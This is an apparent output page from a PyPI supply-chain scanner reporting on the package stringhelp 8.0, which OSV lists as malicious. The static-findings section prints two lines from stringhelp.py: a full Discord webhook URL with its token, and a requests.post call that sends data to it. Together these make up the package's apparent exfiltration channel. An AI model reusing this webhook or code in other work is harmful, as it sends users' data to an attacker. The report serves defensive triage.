stringhelp@8.0 INFO 2.8 Summary
New scan

Chaintrap · PyPI supply chain

PyPI package scan

Registry metadata, verified artifact, OSV for this release, requires_dist dependency OSV pass, line-level rules (pypi_malware_rules), optional pip-audit/Bandit — same report shell as npm-mal-scan.

INFO
package
stringhelp
version
8.0
artifact
stringhelp-8.0.tar.gz
sha256
762c22579bd587d947824ec2aa9d6579a76a1546b1f88f70…
files scanned
7
detection ruleset
pypi_malware_rules 2026-04-17
scanner build
pypi-mal-scan-2026-04-14

Executive summary

PyPI greenfield scan rated this release INFO (heuristic score 2.8 / 10). OSV reported 1 advisory ID(s); static analysis emitted 2 pattern hit(s).

Scanners prioritize signal over certainty: expect both false positives and blind spots. Combine OSV data with static findings and your own policy — this report does not replace manual review.

Heuristic score: 2.8 / 10 · Scanner: pypi-mal-scan-2026-04-14

Verdict
INFO
OSV IDs
1
Static hits
2

Verdict rationale

Heuristic score combines static rules, OSV hits for this exact version, and optional pip-audit / Bandit output. It is not a malware conviction.

Raw sum before 10.0 cap: 2.8 · Capped total: 2.8

Findings by severity high: 1, low: 1

Static pattern rules (line-level)2.352 match(es); weights sum to this bucket before global cap.
OSV advisories (exact name@version)0.451 record(s); capped at 4.0 points.
pip-audit (optional)0 vuln row(s); capped at 3.0; enable PYPI_PIP_AUDIT.
Bandit high/critical (optional)0 finding(s); capped at 3.0; enable PYPI_BANDIT.

Ruleset: 2026-04-17

  • BLOCK — >= 9.0
  • REVIEW — >= 7.0
  • WARN — >= 4.5
  • INFO — >= 1.5
  • PASS — < 1.5

Source & project links

Use Source Code / Homepage for manual review of the upstream repo. This scan does not clone those URLs.

No project URLs in PyPI metadata.

  • Links come from PyPI JSON metadata only; this scan does not clone or diff the upstream repository.
  • Static rules and optional Bandit run on the **published wheel/sdist** bytes from PyPI, which may omit files present only in VCS.

Publisher identity

Author email none@example.com

Trove classifiers

License :: OSI Approved :: MIT LicenseOperating System :: OS IndependentProgramming Language :: Python :: 3

Package overview

A small example package made to help you with strings

Scan coverage

Line-level rules ran over text-like files under the extracted artifact (max 400000 bytes per file).

  • Files scanned: 7
  • Skipped (over size): 0
  • Approx. lines: 70
  • Text bytes read: 2286

Files by suffix (top 24):

.py3
.txt3
.cfg1
🔎

1 known vulnerability (OSV)

OSV lookup: Checked

Chaintrap pairs static behavior signals above with OSV data for this exact version — cross-check CVEs and malware listings with install scripts, execution paths, and scanner findings.

Source: osv.dev — queried at scan time.

1 advisory ID(s) returned by OSV query.

MAL-2026-2854 UNKNOWN Published 2026-04-18T09:09:55Z

Malicious code in stringhelp (PyPI)

Malicious code in stringhelp (PyPI)

Malicious-package listing (OSV MAL-* namespace — e.g. OpenSSF malicious-packages). Treat as supply-chain malware signal; confirm with linked advisories and rotate credentials if this version was installed on sensitive hosts.

Direct dependencies (OSV)

Declared requires_dist strings from package metadata. Each dependency is resolved to the highest PyPI version matching the version specifier, then checked against OSV for that exact name@version. Does not affect the headline verdict score.

  • Each row uses the highest PyPI release that satisfies the declared version specifier.
  • Environment markers are not evaluated; resolution ignores ``python_version`` / platform constraints.
  • This is not a lockfile install graph — only direct ``requires_dist`` strings from package metadata.

No requires_dist entries in PyPI metadata for this release.

Static pattern findings

Detection library pypi_malware_rules (2026-04-17) — 75 line-level rules over .py and other text artifacts. Matches are triage signals, not proof of malice.

Matches by category network (2) · Total hits 2

discord_webhook_url high

Category network

Discord webhook URLs are common exfil/C2 channels for stealers (RAT mutants, token theft).

Analyst note Legitimate bots exist — correlate with other high-signal rules.

stringhelp-8.0/stringhelp/stringhelp.py:9

Snippet
self.url = 'https://discordapp.com/api/webhooks/746555804047507537/SErkxjuHm1FwqSER8ll7DQtmbbjXAtfMtGk88b3O21Ev_uhbxziZ2-5Qz-1nL4RUsMIO'
requests_http low

Category network

Outbound HTTP via requests.

Analyst note Check URLs (literal vs dynamic) and whether responses feed exec/load.

stringhelp-8.0/stringhelp/stringhelp.py:12

Snippet
requests.post(self.url, data={'content': item})

Analyst next steps

Recommended checks
  • Treat findings as triage signals, not automatic malware verdicts.
  • Open the Source Code / Homepage links above and compare tagged releases to the artifact hash you scanned.
  • If MAL-* OSV IDs appear, review OpenSSF malicious-packages context and isolate affected hosts.
  • Pin dependencies with hashes in CI; prefer wheels from PyPI with digest verification.
Chaintrap · PyPI scan Package stringhelp@8.0